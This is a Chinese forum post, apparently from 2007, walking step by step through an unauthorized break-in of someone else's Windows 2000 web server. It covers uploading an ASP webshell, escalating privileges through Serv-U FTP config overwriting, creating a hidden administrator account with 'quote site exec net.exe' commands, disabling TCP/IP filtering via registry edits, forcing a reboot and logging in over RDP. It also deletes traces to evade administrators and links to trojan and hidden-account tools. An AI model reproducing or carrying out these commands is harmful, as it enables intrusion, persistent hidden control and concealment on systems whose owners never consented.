WEBSHELL入侵FTP提权突破TCPIP筛选到3389登陆

<P align=center>WEBSHELL入侵FTP提权突破TCPIP筛选到3389登陆</P><P>最近没事情做一直在研究XP的3389登陆..<BR>昨天扫了一天，扫了很多XP的机子但都是登陆问题，后来看到一台2000的，扫描了一下看，开了80<BR>进入站点研究，论坛有漏洞，我就开始考虑怎么样利用漏洞得到WEBSHELL然后提权，因为服务器开了3389的到ADMIN后就可以直接连接进入，很方便的嘿嘿，不用去开什么3389了。<BR>下面进入正题：</P><P>现进入站点<A target=_blank href="http://XXX.XXX.XXX.XXX/index.asp" target=_blank>http://XXX.XXX.XXX.XXX/index.asp</A> 扫描站点 后台居然可以进入密码居然是空 admin<BR><A target=_blank href="http://XXX.XXX.XXX.XXX/admin/admin.asp" target=_blank>http://XXX.XXX.XXX.XXX/admin/admin.asp</A> 进入后察看上传情况，只能上传图片，，，<BR>再看看，数据库方面，哦也可以备份数据库，看到这我想大家应该知道我要做什么了，传马然后备份..<BR>好，先传一个木马图片，把.ASP木马改为图片后缀..然后上传，，OK<BR>找到上传后的地址.. 备份数据库..&nbsp;&nbsp; 这里怎么备份我就不详细说明了，很多教程里都用的。<BR>得到备份后的地址，现在我是异常激动，这离我拿到ADMIN又进了一步了，<BR>进入ASP木马地址，，，，== 晕啊...&nbsp; 提示出现错误... 再备份看看，，， 还是一样的情况，，，<BR>这个我就不知道是为什么了，，，郁闷....难道没办法了啊... 我不死心，用明小子软件扫看看.</P><P>靠，居然还有论坛，刚才我去看的时候论坛是关的到哦，他为什么关论坛了？修改还是因为有BUG...<BR>利用得到的论坛后台地址看看能不能猜密码出来，用admin试试，，提示密码错误....<BR>恩说明有ADMIN这个账号，接着再试试其他的密码，，，靠还是错误.....<BR>后来在他站点去找了一些数据，比如电话，QQ，邮编什么的，看看都不行，最后没办法把他站点的域名拿来试嘿嘿....运气啊，，，进入了。。。 看来社会工程学有的时候还是有好处的。。进入后看了看服务器情况...没什么好利用的....&nbsp; 察看上传.... 自己加了一个ASP上去，现在可以上传ASP文件了，，，&nbsp; 然后把论坛打开...问我怎么打开..倒哦，，自己去后台慢慢研究就知道了。用ADMIN号进入论坛，上传了一个ASP马....&nbsp; 倒啊... 不能上传大马，，，那就先写个小的... DIY.ASP 好了，，进入嘿嘿出现熟悉的见面.... 把大马写上去... OK...</P><P>然后在后台把帖子删除了，把传的小马也删除了，把刚才修改的地方都删除....&nbsp; 为了不让论坛管理员发现啊..<BR>进入大马，，我用的海阳2006的...&nbsp; 进入察看服务器情况...&nbsp; 找到了一个</P><P>服务名称: Serv-U<BR>显示名称: Serv-U FTP 服务器<BR>启动类型: 自动<BR>运行状态: True<BR>登录身份: LocalSystem<BR>服务描述: 提供 FTP 服务并允许远程 FTP 客户连接到该计算机<BR>文件路径及参数: D:&#92;Serv-U&#92;ServUDaemon.exe</P><P>嘿嘿，大家知道接着要做什么了吧...&nbsp; 先TELNET看看他的FTP是什么版本的....&nbsp; <BR>晕死....&nbsp; 6.0105的....&nbsp; 溢出没希望了.....<BR>跳转C盘看看，没权限......&nbsp; <BR>WScript.Shell程序运行器进入执行命令看看 NETSTAT -AN<BR>显示看开了不少端口也......&nbsp; 21 23 25 3389 <BR>C盘不能进......&nbsp; 汗....&nbsp; 想到开了FTP服务...&nbsp; 进入 D:&#92;Serv-U&#92; 嘿嘿.. 可以进入，哈哈... 大多朋友知道下面做什么了吧...&nbsp; 把D:&#92;Serv-U&#92;ServUDaemon.ini文件下下来，然后在自己机子上装Serv-U FTP 服务器 这给大家提供一些我的E盘上有下的..&nbsp;&nbsp; <A target=_blank href="http://axiakun.wg333.com/" target=_blank>http://axiakun.wg333.com/</A>其他软件 Serv-U FTP Server v6.1.0.5汉化版.rar 下了后安装...<BR>然后把刚才下的服务器上的ServUDaemon.ini放到我们安装好的FTP文件夹中，运行，，， 然后再自己添加一个用户....&nbsp; 记得要是系统管理员权限的哦....&nbsp; 嘿嘿....<BR>然后把本机上的ServUDaemon.ini文件传上去覆盖... OK...</P><P>连接，，CMD命令执行...FTP连接他...&nbsp; 进入嘿嘿 ...<BR>执行命令，这里很多朋友不知道怎么添加管理员账号 注意哦：</P><P>quote site exec net.exe&nbsp; user axiakun$ 123456 /add</P><P>提示200 表示命令成功&nbsp;&nbsp; 以上quote site exec net.exe调用系统NET.EXE&nbsp; 因为你的FTP账号是管理员全权限的.&nbsp; 所以可以.如果不是就不行哦.... <BR>然后把它加为管理员权限..</P><P>quote site exec net.exe localgroup administrators axiakun$ /add</P><P>提示200 又OK了 ，，&nbsp; 嘿嘿 进ASP木马用NET USER看看 看不到... 倒哦 忘了用户后面有$<BR>NET USER AXIAKUN$ OK&nbsp; 管理员权限了.....<BR>问我为什么用户名后面加$这是为了一会隐藏这个账号啊... 嘿嘿...</P><P>用3389远程登陆连接... 等了一会，，，，&nbsp; 靠....&nbsp; 居然不能进....昏死...<BR>记得以前看过的一篇文章《从上传webshell突破TCPIP筛选到3389登陆》中有提到过这样的情况.<BR>难道这个机子也是这样的..<BR>管他的试试就知道了.....&nbsp; FTP连接....<BR>执行命令</P><P>quote site exec "cacls.exe d: /e /t /g everyone:F" #把d盘设置为everyone可以浏览这样一会导出文件放D盘就可以下载了...</P><P>quote site exec "regedit -e D:&#92;1.reg HKEY_LOCAL_MACHINE&#92;SYSTEM&#92;ControlSet001&#92;Services&#92;Tcpip" #导出注册表里关于TCP/IP筛选的第一处&nbsp; （-e D:&#92;1.reg 导出后放在D盘下，文件1.reg）</P><P>quote site exec "regedit -e D:&#92;2.reg<BR>HKEY_LOCAL_MACHINE&#92;SYSTEM&#92;ControlSet002&#92;Services&#92;Tcpip" #导出注册表里关于TCP/IP筛选的第二处</P><P>quote site exec "regedit -e D:&#92;3.reg<BR>HKEY_LOCAL_MACHINE&#92;SYSTEM&#92;CurrentControlSet&#92;Services&#92;Tcpip" #导出注册表里关于TCP/IP筛选的第三处</P><P>全部导出了，然后回ASP马，把三个下下来...<BR>编辑一下，把关于TCP/IP筛选的几个地方改一下，首先打开1.reg找到"EnableSecurityFilters"=dword:00000001把最后面的数字1改成0后保存，然后更改2.reg,3.reg，更改方法一样.改好后保存...&nbsp; 然后上传，覆盖... OK.....</P><P>在回来FTP命令下....<BR>quote site exec "regedit -s D:&#92;1.reg"<BR>quote site exec "regedit -s D:&#92;2.reg"<BR>quote site exec "regedit -s D:&#92;3.reg"<BR>OK.........&nbsp;&nbsp; </P><P>导入后要从起，，， 那我们让他从起吧...<BR>quote site exec "iisreset /reboot /timeout:00"&nbsp;&nbsp;&nbsp; 利用他自身的iis服务来重新启动他的机器，/timeout:00这个参数是让他立即重新启动..</P><P>嘿嘿...== 进站点看看....&nbsp; 提示错误... 看来在从起了...&nbsp; </P><P>耐心的==...&nbsp; OK&nbsp; 可以了， 连接3389..&nbsp; 进入...&nbsp; 出现了那熟悉而激动的画面...<BR>嘿嘿，，接着把我们要用的东西传上去...</P><P>建立隐藏超级用户.rar<BR>肉(鸡)-(机)保护器1.01正式版.exe</P><P>这两个在我的E盘都用...&nbsp; <A target=_blank href="http://axiakun.wg333.com/mypane.aspx?Path=/" target=_blank>http://axiakun.wg333.com/mypane.aspx?Path=/</A>木马病毒/<BR>下了上传上去...&nbsp; 运行.. 建立隐藏超级用户 添加axiakun$&nbsp; 嘿嘿现在好了<BR>在DOS下和计算机管理里都找不到我的用户名了....</P><P>不想让你的肉鸡掉.就做点安全措施吧...肉(鸡)-(机)保护器1.01正式版.exe我个人觉得还不错的一个东西...</P><P>不过有一个还比这个好一点，能关掉几乎所有的木马端口，和一些有危险的服务进程..（木马端口封杀.rar）这个都是我用了才知道的，重点就是他有TCPIP筛选.. 我用了后才知道，郁闷啊..<BR>不过还是很不错的哦...&nbsp; 改3389端口... 这个你随便改就可以了...</P><P>上面说的那软件我那也有<A target=_blank href="http://axiakun.wg333.com/mypane.aspx?Path=/" target=_blank>http://axiakun.wg333.com/mypane.aspx?Path=/</A>安全相关/<BR>这的三个软件都很不错的安全软件..</P><P>一切OK...&nbsp; 注销..</P><P>好今天就说到这了.... </P><P><BR>&nbsp;<BR></P><p>［此帖子已被 灰儿 在 2007-1-23 13:23:55 编辑过］